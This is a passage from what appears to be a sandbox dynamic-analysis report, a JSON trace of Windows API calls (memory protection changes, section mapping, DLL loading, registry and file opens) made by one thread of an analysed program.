"BaseAddress", + "value": "0x00738000" + }, + { + "name": "RegionSize", + "value": "0x00005000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 219 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00432de4", + "parentcaller": "0x00436014", + "category": "synchronization", + "api": "NtFindAtom", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "AtomName", + "value": "AfxOldWndProc423" + }, + { + "name": "Atom", + "value": "0x0000c083" + } + ], + "repeated": 4, + "id": 220 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00432bf2", + "parentcaller": "0x00436014", + "category": "process", + "api": "NtOpenSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000284" + }, + { + "name": "DesiredAccess", + "value": "0x0000000d" + }, + { + "name": "ObjectAttributes", + "value": "MSCTF.dll" + } + ], + "repeated": 0, + "id": 221 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00432bf2", + "parentcaller": "0x00436014", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000284" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x75400000" + }, + { + "name": "SectionOffset", + "value": "0x00000000" + }, + { + "name": "ViewSize", + "value": "0x000d4000" + }, + { + "name": "Win32Protect", + "value": "0x00000080", + "pretty_value": "PAGE_EXECUTE_WRITECOPY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 222 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00432bf2", + "parentcaller": "0x00436014", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x754c8000" + }, + { + "name": "ModuleName", + "value": "MSCTF.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 223 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00432bf2", + "parentcaller": "0x00436014", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x77119000" + }, + { + "name": "ModuleName", + "value": "ntdll.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00003000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 224 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00432bf2", + "parentcaller": "0x00436014", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x77119000" + }, + { + "name": "ModuleName", + "value": "ntdll.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00003000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 225 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00432bf2", + "parentcaller": "0x00436014", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x754c4000" + }, + { + "name": "ModuleName", + "value": "MSCTF.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 226 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00432bf2", + "parentcaller": "0x00436014", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000284" + } + ], + "repeated": 0, + "id": 227 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00432bf2", + "parentcaller": "0x00436014", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x754c4000" + }, + { + "name": "ModuleName", + "value": "MSCTF.dll" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 228 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00432bf2", + "parentcaller": "0x00436014", + "category": "process", + "api": "NtSetInformationProcess", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessInformationClass", + "value": "35" + }, + { + "name": "ProcessInformation", + "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x05\\x00\\x00\\x00\n\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00o\\x00r\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00n\\x003\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00u\\x00l\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00r\\x00-\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00-\\x000\\x00" + } + ], + "repeated": 0, + "id": 229 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00432bf2", + "parentcaller": "0x00436014", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "DDRAW.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 230 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00432bf2", + "parentcaller": "0x00436014", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "D3D8.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 231 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00432bf2", + "parentcaller": "0x00436014", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "D3D9.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x00000000" + } + ], + "repeated": 1, + "id": 232 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00432bf2", + "parentcaller": "0x00436014", + "category": "misc", + "api": "RtlDosPathNameToNtPathName_U", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "DosFileName", + "value": "C:\\Windows\\System32\\MSCTF.dll" + } + ], + "repeated": 0, + "id": 233 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00432bf2", + "parentcaller": "0x00436014", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000284" + }, + { + "name": "DesiredAccess", + "value": "0x00020000", + "pretty_value": "READ_CONTROL" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\msctf.dll" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 234 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00432bf2", + "parentcaller": "0x00436014", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000284" + } + ], + "repeated": 0, + "id": 235 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00432bf2", + "parentcaller": "0x00436014", + "category": "system", + "api": "DllLoadNotification", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "NotificationReason", + "value": "load" + }, + { + "name": "DllName", + "value": "C:\\Windows\\System32\\MSCTF" + }, + { + "name": "DllBase", + "value": "0x75400000" + } + ], + "repeated": 0, + "id": 236 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00432bf2", + "parentcaller": "0x00436014", + "category": "system", + "api": "LdrpCallInitRoutine", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "MappedPath", + "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\msctf" + }, + { + "name": "BaseAddress", + "value": "0x75400000" + }, + { + "name": "InitRoutine", + "value": "0x7544dbc0" + }, + { + "name": "Reason", + "value": "1" + } + ], + "repeated": 0, + "id": 237 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00432bf2", + "parentcaller": "0x00436014", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74ecd000" + }, + { + "name": "ModuleName", + "value": "IMM32.DLL" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 238 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00432bf2", + "parentcaller": "0x00436014", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74ecd000" + }, + { + "name": "ModuleName", + "value": "IMM32.DLL" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 239 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00432afa", + "parentcaller": "0x00436014", + "category": "synchronization", + "api": "NtFindAtom", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "AtomName", + "value": "AfxOldWndProc423" + }, + { + "name": "Atom", + "value": "0x0000c083" + } + ], + "repeated": 4, + "id": 240 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00432bf2", + "parentcaller": "0x00436014", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000028c" + } + ], + "repeated": 0, + "id": 241 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00432bf2", + "parentcaller": "0x00436014", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000290" + } + ], + "repeated": 0, + "id": 242 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00432bf2", + "parentcaller": "0x00436014", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74ecd000" + }, + { + "name": "ModuleName", + "value": "IMM32.DLL" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "OldAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 243 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00432bf2", + "parentcaller": "0x00436014", + "category": "process", + "api": "NtProtectVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x74ecd000" + }, + { + "name": "ModuleName", + "value": "IMM32.DLL" + }, + { + "name": "NumberOfBytesProtected", + "value": "0x00001000" + }, + { + "name": "MemoryType", + "value": "0x00000000" + }, + { + "name": "NewAccessProtection", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "OldAccessProtection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 244 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x0042f900", + "parentcaller": "0x0042fb8d", + "category": "process", + "api": "NtOpenSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000290" + }, + { + "name": "DesiredAccess", + "value": "0x00000004" + }, + { + "name": "ObjectAttributes", + "value": "\\Sessions\\1\\Windows\\ThemeSection" + } + ], + "repeated": 0, + "id": 245 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x0042f900", + "parentcaller": "0x0042fb8d", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000290" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x02560000" + }, + { + "name": "SectionOffset", + "value": "0x0019e8c4" + }, + { + "name": "ViewSize", + "value": "0x00001000" + }, + { + "name": "Win32Protect", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 246 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x0042f900", + "parentcaller": "0x0042fb8d", + "category": "process", + "api": "NtOpenSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x0000028c" + }, + { + "name": "DesiredAccess", + "value": "0x00000004" + }, + { + "name": "ObjectAttributes", + "value": "\\Windows\\Theme1900088189" + } + ], + "repeated": 0, + "id": 247 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x0042f900", + "parentcaller": "0x0042fb8d", + "category": "process", + "api": "NtOpenSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000294" + }, + { + "name": "DesiredAccess", + "value": "0x00000004" + }, + { + "name": "ObjectAttributes", + "value": "\\Sessions\\1\\Windows\\Theme4115012902" + } + ], + "repeated": 0, + "id": 248 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x0042f900", + "parentcaller": "0x0042fb8d", + "category": "process", + "api": "NtUnmapViewOfSectionEx", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x02560000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "Flags", + "value": "0" + } + ], + "repeated": 0, + "id": 249 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x0042f900", + "parentcaller": "0x0042fb8d", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000290" + } + ], + "repeated": 0, + "id": 250 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x0042f900", + "parentcaller": "0x0042fb8d", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x0000028c" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x04c40000" + }, + { + "name": "SectionOffset", + "value": "0x0019ef50" + }, + { + "name": "ViewSize", + "value": "0x000e2000" + }, + { + "name": "Win32Protect", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 251 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x0042f900", + "parentcaller": "0x0042fb8d", + "category": "process", + "api": "NtMapViewOfSection", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "SectionHandle", + "value": "0x00000294" + }, + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x02560000" + }, + { + "name": "SectionOffset", + "value": "0x0019ef50" + }, + { + "name": "ViewSize", + "value": "0x00004000" + }, + { + "name": "Win32Protect", + "value": "0x00000002", + "pretty_value": "PAGE_READONLY" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 252 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x0042f900", + "parentcaller": "0x0042fb8d", + "category": "system", + "api": "LdrGetDllHandle", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "ntdll.dll" + }, + { + "name": "ModuleHandle", + "value": "0x76ff0000" + } + ], + "repeated": 0, + "id": 253 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x0042f900", + "parentcaller": "0x0042fb8d", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "ntdll.dll" + }, + { + "name": "ModuleHandle", + "value": "0x76ff0000" + }, + { + "name": "FunctionName", + "value": "RtlRegisterFeatureConfigurationChangeNotification" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x770224a0" + } + ], + "repeated": 0, + "id": 254 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x0042f900", + "parentcaller": "0x0042fb8d", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "ntdll.dll" + }, + { + "name": "ModuleHandle", + "value": "0x76ff0000" + }, + { + "name": "FunctionName", + "value": "NtQueryWnfStateData" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x770640c0" + } + ], + "repeated": 0, + "id": 255 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x0042f900", + "parentcaller": "0x0042fb8d", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "ntdll.dll" + }, + { + "name": "ModuleHandle", + "value": "0x76ff0000" + }, + { + "name": "FunctionName", + "value": "RtlSubscribeWnfStateChangeNotification" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x77020730" + } + ], + "repeated": 0, + "id": 256 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x0042f900", + "parentcaller": "0x0042fb8d", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "ntdll.dll" + }, + { + "name": "ModuleHandle", + "value": "0x76ff0000" + }, + { + "name": "FunctionName", + "value": "RtlDisownModuleHeapAllocation" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7705c290" + } + ], + "repeated": 0, + "id": 257 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x0042f900", + "parentcaller": "0x0042fb8d", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "ntdll.dll" + }, + { + "name": "ModuleHandle", + "value": "0x76ff0000" + }, + { + "name": "FunctionName", + "value": "RtlQueryFeatureConfiguration" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x770552d0" + } + ], + "repeated": 0, + "id": 258 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x0042f900", + "parentcaller": "0x0042fb8d", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "ntdll.dll" + }, + { + "name": "ModuleHandle", + "value": "0x76ff0000" + }, + { + "name": "FunctionName", + "value": "RtlDllShutdownInProgress" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7704f590" + } + ], + "repeated": 0, + "id": 259 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x0042f900", + "parentcaller": "0x0042fb8d", + "category": "synchronization", + "api": "NtCreateMutant", + "status": true, + "return": "0x40000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000290" + }, + { + "name": "MutexName", + "value": "Local\\SM0:9436:168:WilStaging_02" + }, + { + "name": "InitialOwner", + "value": "0" + } + ], + "repeated": 0, + "id": 260 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x0042f900", + "parentcaller": "0x0042fb8d", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000290" + }, + { + "name": "Milliseconds", + "value": "18446744073709551615" + }, + { + "name": "Status", + "value": "Infinite" + } + ], + "repeated": 0, + "id": 261 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x0042f900", + "parentcaller": "0x0042fb8d", + "category": "system", + "api": "GetSystemTimeAsFileTime", + "status": true, + "return": "0x00000000", + "arguments": [], + "repeated": 0, + "id": 262 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x0042f900", + "parentcaller": "0x0042fb8d", + "category": "system", + "api": "NtWaitForSingleObject", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000298" + }, + { + "name": "Milliseconds", + "value": "0" + } + ], + "repeated": 0, + "id": 263 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x0042f900", + "parentcaller": "0x0042fb8d", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000298" + } + ], + "repeated": 0, + "id": 264 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x0042f900", + "parentcaller": "0x0042fb8d", + "category": "synchronization", + "api": "NtReleaseMutant", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x00000290" + } + ], + "repeated": 1, + "id": 265 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x04d31000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 266 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "windows", + "api": "PostMessageW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "WindowHandle", + "value": "0x0002024c" + }, + { + "name": "Message", + "value": "0x00000005" + } + ], + "repeated": 0, + "id": 267 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "registry", + "api": "NtOpenKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000029c" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000000" + }, + { + "name": "ObjectAttributesName", + "value": "\\Registry\\MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide" + } + ], + "repeated": 0, + "id": 268 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "registry", + "api": "NtQueryValueKey", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000029c" + }, + { + "name": "ValueName", + "value": "PreferExternalManifest" + }, + { + "name": "FullName", + "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest" + } + ], + "repeated": 0, + "id": 269 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000029c" + } + ], + "repeated": 0, + "id": 270 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "filesystem", + "api": "NtOpenFile", + "status": false, + "return": "0xffffffffc0000034", + "pretty_return": "OBJECT_NAME_NOT_FOUND", + "arguments": [ + { + "name": "FileHandle", + "value": "0x00000000" + }, + { + "name": "DesiredAccess", + "value": "0x001200a9", + "pretty_value": "FILE_GENERIC_READ|FILE_GENERIC_EXECUTE" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\uxtheme.dll.Config" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 271 + }, + { + "timestamp": "2025-03-07 22:33:08,000", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "filesystem", + "api": "NtOpenFile", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileHandle", + "value": "0x0000029c" + }, + { + "name": "DesiredAccess", + "value": "0x00120089", + "pretty_value": "FILE_GENERIC_READ" + }, + { + "name": "FileName", + "value": "C:\\Windows\\System32\\uxtheme.dll" + }, + { + "name": "ShareAccess", + "value": "5", + "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" + } + ], + "repeated": 0, + "id": 272 + }, + { + "timestamp": "2025-03-07 22:33:08,016", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "__notification__", + "api": "sysenter", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ThreadIdentifier", + "value": "9440" + }, + { + "name": "Module", + "value": "KERNEL32.DLL" + }, + { + "name": "Return Address", + "value": "0x76112b4c" + } + ], + "repeated": 0, + "id": 273 + }, + { + "timestamp": "2025-03-07 22:33:08,016", + "thread_id": "9440", + "caller": "0x00436014", + "parentcaller": "0x00436182", + "category": "system", + "api": "NtClose", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + 